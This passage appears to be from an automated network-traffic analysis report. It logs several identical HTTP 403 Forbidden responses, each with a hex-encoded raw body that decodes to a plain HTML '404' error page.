62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:23 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:24 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=121X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:25 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=115X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:26 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=115X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:27 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=107X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:28 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=114X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
